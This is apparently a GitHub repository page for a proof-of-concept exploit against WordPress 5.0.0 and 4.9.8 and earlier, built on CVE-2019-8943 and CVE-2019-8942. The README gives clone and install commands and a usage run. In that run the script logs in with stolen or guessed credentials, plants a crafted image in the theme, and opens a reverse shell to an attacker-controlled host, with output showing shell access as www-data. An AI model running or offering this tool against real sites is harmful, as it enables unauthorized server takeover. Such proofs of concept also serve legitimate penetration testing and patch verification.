Skip to content

ret2x-tools/poc-wordpress-5.0.0

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commits
 
 
 
 
 
 

Repository files navigation

WordPress 5.0.0 Crop-image Remote Code Execution

Description

The exploit code leverages the CVE-2019-8943 and CVE-2019-8942 vulnerabilities to gain remote code execution on WordPress 5.0.0 and <= 4.9.8.

Installation

git clone https://github.com/ret2x-tools/poc-wordpress-5.0.0.git
pip install -r requirements.txt

Usage

root@parrot:~# python3 poc.py --url http://www.wpsite.com -u kwheel -p qwerty -lhost 10.10.6.2 -lport 443
[*] Authenticating to wordpress
[+] Login successful
[*] Uploading image
[+] Image uploaded
[*] Updating image
[*] Including image into theme
[*] Creating post
[*] Starting listener on 443
[*] Executing reverse shell
bash: cannot set terminal process group (921): Inappropriate ioctl for device
bash: no job control in this shell
www-data@blog:/var/www/wordpress$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

References

https://blog.sonarsource.com/wordpress-image-remote-code-execution/

https://www.youtube.com/watch?v=6Sxs4vQJK_s

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages